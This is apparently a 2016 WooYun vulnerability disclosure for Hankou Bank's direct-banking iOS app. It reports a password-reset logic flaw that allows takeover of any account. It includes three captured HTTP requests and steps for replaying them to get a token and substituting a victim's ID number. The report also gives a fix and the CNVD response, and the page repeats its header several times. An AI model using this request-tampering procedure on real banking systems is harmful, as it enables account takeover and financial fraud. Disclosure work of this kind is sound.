P2P金融安全之汉口银行直销银行任意账户登录

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0187309

漏洞标题：P2P金融安全之汉口银行直销银行任意账户登录

漏洞作者：咚咚呛

提交时间：2016-03-21 17:30

修复时间：2016-05-08 16:25

公开时间：2016-05-08 16:25

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-03-21：细节已通知厂商并且等待厂商处理中
2016-03-24：厂商已经确认，细节仅向厂商公开
2016-04-03：细节向核心白帽子及相关领域专家公开
2016-04-13：细节向普通白帽子公开
2016-04-23：细节向实习白帽子公开
2016-05-08：细节向公众公开

简要描述：

此次风险影响汉口银行直销银行的所有账户。

详细说明：

此风险漏洞在ios客户端密码找回功能中，漏洞利用步骤如下：
1、首先正常操作密码找回功能，可知其流程如下，填写自己正确的跟人信息，如：

2、填写正确信息后跳入第二部，输入要篡改的密码，如123abc等，

填写完毕后点击下一步并进行抓包，如图：
三个包记录如下：

POST /hkzxyh/Timestamp.do HTTP/1.1
Host: **.**.**.**
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/json
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=D38E626DEB05D50C1DA095DB1AA555C8
User-Agent: CSII-MOBILE-EBANK IPHONE
Content-Length: 53
Accept-Encoding: gzip
Connection: close
{"LoginType":"P","_ChannelId":"PMBS","BankId":"9999"}

POST /hkzxyh/GenToken.do HTTP/1.1
Host: **.**.**.**
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/json
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=D38E626DEB05D50C1DA095DB1AA555C8
User-Agent: CSII-MOBILE-EBANK IPHONE
Content-Length: 53
Accept-Encoding: gzip
Connection: close
{"LoginType":"P","_ChannelId":"PMBS","BankId":"9999"}

POST /hkzxyh/ResetLoginPwd.do HTTP/1.1
Host: **.**.**.**
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/json
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=D38E626DEB05D50C1DA095DB1AA555C8
User-Agent: CSII-MOBILE-EBANK IPHONE
Content-Length: 492
Accept-Encoding: gzip
Connection: close
{"BankId":"9999","LoginType":"P","IdNo":"110000198506144557","ConfirmLoginPassword":"W8eA591FHS4xcRu6pjoCRWtiz3rAFUzto2UhmL5J3Hk4PMOv2/+VJ0CSLBDeWg2DPP+s+bFoVjrel77AN+mH3T81HNu3de/LDMCoNDbBljyQhbt6+9oCCL6zfCrQbOpkg9m23Z1Sygyqv9n3xE8o2YdkuEzkWRGUoFABDJt/q8U=","LoginPassword":"mrnnpsg7Uwk829qxTkVvs9on5M4wzzQegUpdctcqmdYiXL5FI+ELkvM8Rmb4C3E2qMQpsE1OunkuR+mOGsaUUjaoTGBG2g65RhGXcm685iQS0DglNBha/maHneYFXmQxCVZIvay0ySoeP2N0Re7ps6ohzpdprJ/W0H01YM1QLVw=","_tokenName":"6V0Bwi","_ChannelId":"PMBS"}

观察最后一个包，关键数据为IdNo及用户号码，尝试把此号码改为被攻击者号码，进行攻击,流程如下
1、重放前两个包拿到_tokenName，如图：

2、获取到的_tokenName和IdNo号码(如身份证：130502199001140612)带入到关键数据包中，如图：

即可篡改成功
使用被攻击者身份证登录后如图：

漏洞证明：

修复方案：

建议在短信验证及密码重置的功能页面统一验证，防止分布绕过。

版权声明：转载请注明来源咚咚呛@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：9

确认时间：2016-03-24 16:25

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,并抄报湖北分中心协助处置,由其后续协调网站管理单位处置.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0187309

漏洞标题：P2P金融安全之汉口银行直销银行任意账户登录

相关厂商：汉口银行

漏洞作者：咚咚呛

提交时间：2016-03-21 17:30

修复时间：2016-05-08 16:25

公开时间：2016-05-08 16:25

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源咚咚呛@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0187309

漏洞标题：P2P金融安全之汉口银行直销银行任意账户登录

相关厂商：汉口银行

漏洞作者： 咚咚呛

提交时间：2016-03-21 17:30

修复时间：2016-05-08 16:25

公开时间：2016-05-08 16:25

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0187309"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 咚咚呛@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：咚咚呛

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源咚咚呛@乌云